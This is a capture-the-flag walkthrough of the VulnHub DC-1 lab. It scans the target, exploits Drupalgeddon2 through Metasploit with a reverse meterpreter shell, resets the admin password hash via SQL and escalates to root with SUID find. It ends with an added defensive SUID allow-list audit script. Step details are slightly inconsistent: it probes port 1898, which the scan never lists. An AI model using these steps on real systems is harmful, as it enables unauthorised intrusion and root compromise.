Background:
Download: https://www.vulnhub.com/entry/dc-1-1,292/
Target IP for this run: 192.168.2.11
Key techniques:
- Drupal 7 vulnerability exploitation
- Privilege escalation via the SUID find command
1. Information gathering
1.1 Find the target host's IP
Use arp-scan to sweep the local network with arp-scan -l; the result:
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 192.168.2.253
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.2.2 ec:3c:bb:ae:b7:45 Huawei Device Co., Ltd.
192.168.2.11 00:0c:29:a7:2b:2f VMware, Inc.
From the MAC address (VMware) we can tell that the target's IP is 192.168.2.11.
1.2 Scan the target's open ports
Use nmap to scan all ports with nmap -sS -Pn -p 1-65535 192.168.2.11; the result:
└─# nmap -sS -Pn -p 1-65535 192.168.2.11 // scan for open ports
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-09 09:37 CST
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 88.53% done; ETC: 09:37 (0:00:01 remaining)
Nmap scan report for 192.168.2.11
Host is up (0.00080s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
37297/tcp open unknown
MAC Address: 00:0C:29:A7:2B:2F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 9.27 seconds
The scan shows that ports 22, 80, 111 and 37297 are open on the target.
1.3 Fingerprinting
- Used the 御剑 web fingerprinting tool against http://192.168.2.11:1898; the application fingerprint came back as Drupal.
- That did not reveal the CMS version, so CMSeek was used to probe it: python3 cmseek.py -u 192.168.2.11:1898, which identified Drupal 7.
- Used httprint to fingerprint the web server: Apache/2.2.22 (Debian).
2. GetShell
Searching for known vulnerabilities in Drupal 7 turns up CVE-2018-7600 (Drupal 7.x code execution), so we try to exploit it with msf.
└─# msfdb run // start msf
[+] Starting database
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
=[ metasploit v6.0.45-dev ]
+ -- --=[ 2134 exploits - 1139 auxiliary - 364 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: When in a module, use back to go
back to the top level prompt
[*] Starting persistent handler(s)...
msf6 > search drupal // search for Drupal-related exploit modules
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2 // select the exploit module
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options // show the module options
Module options (exploit/unix/webapp/drupal_drupalgeddon2):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.19 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.2.11
RHOSTS => 192.168.2.11 // set the target host IP
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 80
RPORT => 80 // set the target port
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run // launch the exploit
[*] Started reverse TCP handler on 192.168.2.19:4444
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated.
[*] Sending stage (39282 bytes) to 192.168.2.11
[*] Meterpreter session 1 opened (192.168.2.19:4444 -> 192.168.2.11:56933) at 2021-12-09 17:23:21 +0800
meterpreter > shell // drop into a system shell
Process 3338 created.
Channel 0 created.
We have a shell!
3. Privilege escalation
- Upgrade to an interactive shell. The shell we obtained is not fully interactive; on a system that has python installed, the pty module can spawn a native terminal with a one-line script. In the shell, run python -c 'import pty; pty.spawn("/bin/bash")'.
python -c 'import pty;pty.spawn("/bin/bash")' // spawn a native terminal
www-data@DC-1:/var/www$
www-data@DC-1:/var/www$ whoami // check current privileges
whoami
www-data
- Run ls to list the current directory; it contains a file named flag1.txt.
www-data@DC-1:/var/www$ ls // list the current directory
ls
COPYRIGHT.txt MAINTAINERS.txt flag1.txt profiles web.config
INSTALL.mysql.txt README.txt includes robots.txt xmlrpc.php
INSTALL.pgsql.txt UPGRADE.txt index.php scripts
INSTALL.sqlite.txt abc install.php sites
INSTALL.txt authorize.php misc themes
LICENSE.txt cron.php modules update.php
www-data@DC-1:/var/www$ cat flag1.txt // read flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.
flag1.txt hints that we need to look at the config file. In /var/www/sites/default, settings.php reveals the database credentials: user dbuser, password R0ck3t.
- Try resetting the admin user's password in the database. Generate a hash for the new password with the hashing script shipped under scripts in the web root: php /var/www/scripts/password-hash.sh password. Then swap the generated hash in for the admin user: update drupaldb.users set pass="$S$DgNSiYzRbilwq18C5.D/pnvrvdoKncm5WxBG7AIDqwFNKDi0TJCL" where name="admin"; Log in to the site with username admin and password password. The flag3 hint tells us to use the -exec option of find to escalate privileges.
- SUID privilege escalation: find has the SUID bit set, so it runs as root when invoked, and can therefore be used to escalate. After escalating, go to /root and read the final flag.
www-data@DC-1:/var/www$ find / -user root -perm -4000 -print 2>/dev/null // look for SUID files
find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
www-data@DC-1:/var/www$ mkdir abc // create a directory to use as find's starting point for the SUID escalation
www-data@DC-1:/var/www$ find abc -exec '/bin/sh' \; // escalate via find
find abc -exec '/bin/sh' \;
# whoami // check current privileges
whoami
root
# cd /root // change to root's home directory
cd /root
# ls
ls
thefinalflag.txt
# cat thefinalflag.txt // read the final flag
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
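From the defender's side, the lesson of the SUID step is that a setuid-root find (or any setuid binary the distribution did not ship that way) should be caught before anyone can use it. Below is an added POSIX sh example, not part of the original writeup, that feeds the same enumeration command into an allow-list check; the baseline list is a constructed assumption for a Debian-like host, and the sample input is the enumeration output from the session above.

```shell
# Added defensive example (not from the writeup): audit SUID-root binaries
# against an allow-list and flag everything else. SUID_BASELINE is a
# constructed assumption for a Debian-like host; tune it to your packages.
SUID_BASELINE='
/bin/mount
/bin/umount
/bin/su
/bin/ping
/bin/ping6
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
'

# audit_suid: read one path per line on stdin and print every path that is
# not on the allow-list. Returns 1 if anything unexpected was found, else 0.
audit_suid() {
    found=0
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! printf '%s\n' "$SUID_BASELINE" | grep -qxF -- "$path"; then
            printf 'UNEXPECTED SUID root: %s\n' "$path"
            found=1
        fi
    done
    return "$found"
}

# audit_writeup_sample: run the check over the list that the writeup's own
# enumeration produced (sample input copied from the session above).
audit_writeup_sample() {
    printf '%s\n' /bin/mount /bin/ping /bin/su /bin/ping6 /bin/umount \
        /usr/bin/chsh /usr/bin/passwd /usr/bin/newgrp /usr/bin/chfn \
        /usr/bin/gpasswd /usr/bin/procmail /usr/bin/find /usr/sbin/exim4 \
        /usr/lib/pt_chown /usr/lib/openssh/ssh-keysign \
        /usr/lib/eject/dmcrypt-get-device \
        /usr/lib/dbus-1.0/dbus-daemon-launch-helper /sbin/mount.nfs |
        audit_suid
}

# audit_live_host: the enumeration command the writeup uses, fed into the
# allow-list check; run it as root from cron or a configuration-audit job.
audit_live_host() {
    find / -user root -perm -4000 -print 2>/dev/null | audit_suid
}
```

On the DC-1 sample the check flags six binaries, among them /usr/bin/find, which is exactly the one the walkthrough abuses; a non-zero exit status makes it easy to wire into a monitoring job.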